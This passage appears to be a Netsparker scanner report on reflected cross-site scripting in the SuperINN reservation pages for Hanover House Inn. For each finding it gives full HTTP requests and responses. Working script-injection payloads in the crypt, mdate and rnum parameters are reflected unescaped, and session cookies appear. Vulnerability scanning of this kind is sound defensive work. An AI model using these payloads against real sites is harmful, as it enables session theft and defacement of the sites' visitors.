Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Content-Length: 70
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f11%2f2011&text2=12&Submit2=VIEW+CHART&BUTTON2=RETURN+TO+MENU

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:06:55 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x000289)</script><br>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x0002B4)</script>
text1 POST 8/11/2011
text2 POST 12

Request

POST /copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002B4)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_3.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Content-Length: 28
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f11%2f2011&text2=12

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:07:44 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x0002B4)</script><br>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x0002C6)</script>
text1 POST 8/11/2011
text2 POST 12
Submit2 POST VIEW CHART

Request

POST /copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002C6)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_3.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Content-Length: 47
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f11%2f2011&text2=12&Submit2=VIEW+CHART

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:08:27 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x0002C6)</script><br>
- /copy1/res_1_BNR.asp

/copy1/res_1_BNR.asp

https://www.superinn.com/copy1/res_1_BNR.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x000326)</script>
text1 POST 8/11/2011
text2 POST 3
text3 POST 2
Submit POST CHECK AVAILABILITY
BUTTON POST RETURN TO MENU
rnum POST 3

Request

POST /copy1/res_1_BNR.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000326)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Content-Length: 90
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f11%2f2011&text2=3&text3=2&Submit=CHECK+AVAILABILITY&BUTTON=RETURN+TO+MENU&rnum=3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:11:00 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x000326)</script><br>
- /copy1/Res_1.asp

/copy1/Res_1.asp

https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX..

Parameters

Parameter Type Value
crypt GET �p[������bkP�����}X���ǯ�|
mdate GET '"--></style></script><script>alert(0x0002B3)</script>
rnum GET 1

Request

GET /copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002B3)%3C/script%3E&rnum=1 HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:07:37 GMT
X-Powered-By: ASP.NET
Content-Length: 12161
Content-Type: text/html
Cache-control: private



<html>
<head>
<link rel="stylesheet" href="webviewstyle.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" type="text/css">
<title>Online Reservations and Availability</title>
<script>
var statusmsg=""

function hidestatus(){
window.status=statusmsg
return true
}

</script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body>
<br><TABLE cellSpacing=0 cellPadding=0 width=745 align=center border=0>
<TBODY>
<TR>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=16 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=54 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=58 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=112 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=109 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=82 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=135 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=156 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=17 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=6 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=75
alt="Hanover House Inn on Martha's Vineyard - Arrive as Strangers, Leave as Friends. 800-339-1066"
src="https://www.superinn.com/db/381/webview/top.jpg"
width=745 border=0 name=top></TD>
<TD><IMG height=75
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topleft.jpg"
width=16 border=0 name=topleft></TD>
<TD align=left
background="https://www.superinn.com/db/381/webview/template2_r2_c9.jpg"
colSpan=8>
<A target="_top"
href="http://www.hanoverhouseinn.com/index.shtml"><IMG height=29
alt="Hanover House Home Page"
src="https://www.superinn.com/db/381/webview/home.jpg"
width=54 border=0 name=home></A><A target="_top"
href="http://www.hanoverhouseinn.com/rates.shtml"><IMG height=29 alt=Rates
src="https://www.superinn.com/db/381/webview/rates.jpg"
width=58 border=0 name=rates></A><A target="_top"
href="http://www.hanoverhouseinn.com/specials.shtml"><IMG height=29
alt="Special Offers at the Hanover House B&amp;B"
src="https://www.superinn.com/db/381/webview/specials.jpg"
width=112 border=0 name=specials></A><A target="_top"
href="http://www.hanoverhouseinn.com/rooms.shtml"><IMG height=29
alt="Guest Rooms"
src="https://www.superinn.com/db/381/webview/rooms.jpg"
width=109 border=0 name=rooms></A><A target="_top"
href="http://www.hanoverhouseinn.com/location.shtml"><IMG height=29
alt="Where we are located on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/location.jpg"
width=82 border=0 name=mlocation></A><A
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;"><IMG height=29
alt="Click here for a printable brochure"
src="https://www.superinn.com/db/381/webview/print.jpg"
width=135 border=0 name=print></A><A target="_top"
href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
target=_blank><IMG height=29 alt="Online Reservations"
src="https://www.superinn.com/db/381/webview/onlinereservations.jpg"
width=156 border=0 name=onlinereservations></A> </TD>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/right.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topright.jpg"
width=6 border=0 name=topright></TD>
<TD><IMG height=29
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=392
src="https://www.superinn.com/db/1/webview/left.jpg"
width=16 border=0 name=left></TD>
<TD vAlign=top bgColor=#ffffff colSpan=8 rowSpan=2>


<script>
function CheckDate()
{
d=form1.text1.value; //if none selected d = false
if (d=='') {
alert('Please enter a check-in date.');
form1.text1.focus();
return false ;
}

e=form1.text2.value; //if none selected d = false
if (e=='' || isNaN(e)) {
alert('Please enter a number under number of nights.');
form1.text2.focus();
return false ;
}

f= 0 + form1.text3.value; //if none selected d = false
if (f<1 || isNaN(f)) {
alert('Please enter a number under number of guests.');
form1.text3.focus();
return false ;
}
}
</script>

<form name="form1" action="res_1_B.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" method="post" >

<div align="center"><br>
<img src='../db/381/webview//nav1.gif'><br><br>

<table width="400" id="box" align="center" cellspacing="1">
<tr>
<td height="30" class="boxoff" align="center"><span class="boxheader">Check Availability</span>
</td>
</tr>
<tr>
<td nowrap class="boxoff">
<table width="350" cellspacing="5" class="boxheader">
<tr>
<td width="190">Please Select A Check In Date:
<td width="160"><a name="dcdummy:27"><input name="text1" value="'"--></style></script><script>netsparker(0x0002B3)</script>" size="12" onFocus="this.blur()"></a>&nbsp;<a href="javascript:void(0)" onclick="if(self.gfPop)gfPop.fPopCalendar(document.form1.text1);return false;"><img class="PopcalTrigger" align="absmiddle" src="../cal07/normal/calbtn.gif" width="34" height="22" border="0" alt=""></a>
<tr>
<td colspan="2" align="right" class="text10">(Use Calendar to select a date)
<tr>
<td>Enter Number of Nights:
<td><input type="text" name="text2" size="2" maxlength="2" value="">
<tr>
<td>Enter Number of Guests:
<td valign="top"><input type="text" name="text3" size="2" maxlength="2"
value='2'><tr><td colspan=2>Sorry, we do not allow pets.
</table>

</font></b> </p>
<p align="center">
<input type="submit" name="Submit" value="CHECK AVAILABILITY" onClick="return CheckDate()" class="formBtnb185">

<input type="BUTTON" onClick="location.href='res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C'" value="RETURN TO CHART" name="BUTTON" class="formBtnb185">

<br>
<br>
</p>
<input type="hidden" name="rnum" value="1">

<script language="javascript">
document.form1.text2.focus();
</script>

</td>
</tr>
</table>
<br>
<table class=boldtable width="430" border="0" cellspacing="0" cellpadding="3" align="center">
<tr>
<td>

</td>
</tr>
</table>
</div>
</form>

<div align="center">
<a class="linkssml" href="http://www.sarktech.com" target="_blank">Availability and Reservations Powered by SuperINN.com</a><br><br></div>
<TD
background="https://www.superinn.com/db/381/webview/right.jpg"
rowSpan=2><IMG height=426
src="https://www.superinn.com/db/381/webview/right.jpg"
width=6 border=0 name=right></TD>
<TD><IMG height=392
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/leftback.jpg"><IMG
height=34
src="https://www.superinn.com/db/381/webview/leftback.jpg"
width=16 border=0 name=leftback></TD>
<TD><IMG height=34
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=4
src="https://www.superinn.com/db/381/webview/bottomborder.jpg"
width=745 border=0 name=bottomborder></TD>
<TD><IMG height=4
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR></TBODY></TABLE>
<DIV align=center><BR>
<SCRIPT language=JavaScript>
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//-->
</SCRIPT>

<DIV align=center>
<P><SPAN class=bottomnav><A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/index.shtml">Home</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/rates.shtml">Rates</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/specials.shtml">Special Offers</A> ~ <A
target="_top" class=bottomnav href="http://www.hanoverhouseinn.com/rooms.shtml">Guest
Rooms</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/location.shtml">Location</A> ~ </SPAN><A
class=bottomnav
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;">Printable Brochure</A> <SPAN class=bottomnav>~ </SPAN><A
class=bottomnav href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
>Online Reservations</A> <SPAN class=bottomnav>~</SPAN> <A target="_top"
class=bottomnav href="http://www.twinoaksinn.net/">Twin Oaks Inn Home
Page</A><BR><IMG height=28 alt="The Hanvoer House Inn"
src="https://www.superinn.com/db/381/webview/footer2.jpg"
width=427> <BR><SPAN class=bottomnav>PO Box 2108, 28 Edgartown Road, Vineyard
Haven, Massachusetts 02568<BR></SPAN><SPAN class=bottomnavstrong>Reservations:
(800) 696-8633 ~ FAX - (508) 696-6099&nbsp;~ EMAIL: </SPAN>
<SCRIPT language=javascript class=bottomnavstrong>
<!--
var username="innkeeper";
var hostname="hanoverhouseinn.com";
var textstyle="bottomnavstrong";
var linktext= username + "@" + hostname;
document.write("<a href=" + "mail" + "to:" + username + "@" + hostname + "> <span class=" + textstyle+ ">" + linktext + "</span></a>")
//--></SCRIPT>
<SPAN class=bottomnavstrong><BR></SPAN><SPAN class=bottomnav>No smoking. No
pets. <BR><IMG height=36 alt="Located in Vineyard Haven on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/hleafdiv2.jpg"
width=380> <BR>Copyright �
<SCRIPT language=JavaScript><!--
function makeArray() {
for (i = 0; i<makeArray.arguments.length; i++)
this[i + 1] = makeArray.arguments[i];
}

var months = new makeArray('January','February','March',
'April','May','June','July','August','September',
'October','November','December');

var date = new Date();
var day = date.getDate();
var month = date.getMonth() + 1;
var yy = date.getYear();
var year = (yy < 1000) ? yy + 1900 : yy;

document.write(year);
//--></SCRIPT>
Hanover House all rights reserved.</SPAN>
</P></DIV></DIV><test main>
<iframe width=152 height=163 name="gToday:outlook:agenda.js" id="gToday:outlook:agenda.js" src="../cal07/webview/ipopeng.htm" scrolling="no" frameborder="0" style="visibility:visible; z-index:999; position:absolute; top:-500px; left:-500px;">
<LAYER name="gToday:outlook:agenda.js" src="../cal07/webview/npopeng.htm" background="../cal07/webview/npopeng.htm"> </LAYER>
</iframe>


</body>
</html>
- /copy1/res_1_BNR.asp

/copy1/res_1_BNR.asp

https://www.superinn.com/copy1/res_1_BNR.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x0003BB)</script>
text1 POST 8/11/2011
text2 POST 3
text3 POST 2
Submit POST CHECK AVAILABILITY
rnum POST 3

Request

POST /copy1/res_1_BNR.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003BB)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=NNEOLOPACIJJPGIHLLPPAKFH
Content-Length: 68
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f11%2f2011&text2=3&text3=2&Submit=CHECK+AVAILABILITY&rnum=3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:15:02 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x0003BB)</script><br>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x0003F3)</script>
submit POST Next 12 days

Request

POST /copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003F3)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=NNEOLOPACIJJPGIHLLPPAKFH
Content-Length: 19
Expect: 100-continue
Accept-Encoding: gzip, deflate

submit=Next+12+days

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:16:53 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x0003F3)</script><br>
- /copy1/res_1_B.asp

/copy1/res_1_B.asp

https://www.superinn.com/copy1/res_1_B.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x00046F)</script>
text1 POST 8/14/2011
text2 POST 3
text3 POST 2
Submit POST CHECK AVAILABILITY
BUTTON POST RETURN TO CHART
rnum POST 1

Request

POST /copy1/res_1_B.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00046F)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate=8/14/2011&rnum=1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=NNEOLOPACIJJPGIHLLPPAKFH
Content-Length: 91
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f14%2f2011&text2=3&text3=2&Submit=CHECK+AVAILABILITY&BUTTON=RETURN+TO+CHART&rnum=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:19:35 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x00046F)</script><br>
- /copy1/res_1_B.asp

/copy1/res_1_B.asp

https://www.superinn.com/copy1/res_1_B.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x000500)</script>
text1 POST 8/14/2011
text2 POST 3
text3 POST 2
Submit POST CHECK AVAILABILITY
rnum POST 1

Request

POST /copy1/res_1_B.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000500)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate=8/14/2011&rnum=1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=NNEOLOPACIJJPGIHLLPPAKFH
Content-Length: 68
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f14%2f2011&text2=3&text3=2&Submit=CHECK+AVAILABILITY&rnum=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:23:07 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x000500)</script><br>
- /copy1/Res_1.asp

/copy1/Res_1.asp

https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX..

Parameters

Parameter Type Value
crypt GET �p[������bkP�����}X���ǯ�|
mdate GET 8/14/2011
rnum GET '"--></style></script><script>alert(0x0005B1)</script>

Request

GET /copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate=8/14/2011&rnum='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B1)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=JFGOLOPAALLCHINFEDBMAEHE
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:26:39 GMT
X-Powered-By: ASP.NET
Content-Length: 12169
Content-Type: text/html
Cache-control: private



<html>
<head>
<link rel="stylesheet" href="webviewstyle.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" type="text/css">
<title>Online Reservations and Availability</title>
<script>
var statusmsg=""

function hidestatus(){
window.status=statusmsg
return true
}

</script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body>
<br><TABLE cellSpacing=0 cellPadding=0 width=745 align=center border=0>
<TBODY>
<TR>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=16 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=54 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=58 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=112 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=109 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=82 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=135 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=156 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=17 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=6 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=75
alt="Hanover House Inn on Martha's Vineyard - Arrive as Strangers, Leave as Friends. 800-339-1066"
src="https://www.superinn.com/db/381/webview/top.jpg"
width=745 border=0 name=top></TD>
<TD><IMG height=75
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topleft.jpg"
width=16 border=0 name=topleft></TD>
<TD align=left
background="https://www.superinn.com/db/381/webview/template2_r2_c9.jpg"
colSpan=8>
<A target="_top"
href="http://www.hanoverhouseinn.com/index.shtml"><IMG height=29
alt="Hanover House Home Page"
src="https://www.superinn.com/db/381/webview/home.jpg"
width=54 border=0 name=home></A><A target="_top"
href="http://www.hanoverhouseinn.com/rates.shtml"><IMG height=29 alt=Rates
src="https://www.superinn.com/db/381/webview/rates.jpg"
width=58 border=0 name=rates></A><A target="_top"
href="http://www.hanoverhouseinn.com/specials.shtml"><IMG height=29
alt="Special Offers at the Hanover House B&amp;B"
src="https://www.superinn.com/db/381/webview/specials.jpg"
width=112 border=0 name=specials></A><A target="_top"
href="http://www.hanoverhouseinn.com/rooms.shtml"><IMG height=29
alt="Guest Rooms"
src="https://www.superinn.com/db/381/webview/rooms.jpg"
width=109 border=0 name=rooms></A><A target="_top"
href="http://www.hanoverhouseinn.com/location.shtml"><IMG height=29
alt="Where we are located on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/location.jpg"
width=82 border=0 name=mlocation></A><A
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;"><IMG height=29
alt="Click here for a printable brochure"
src="https://www.superinn.com/db/381/webview/print.jpg"
width=135 border=0 name=print></A><A target="_top"
href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
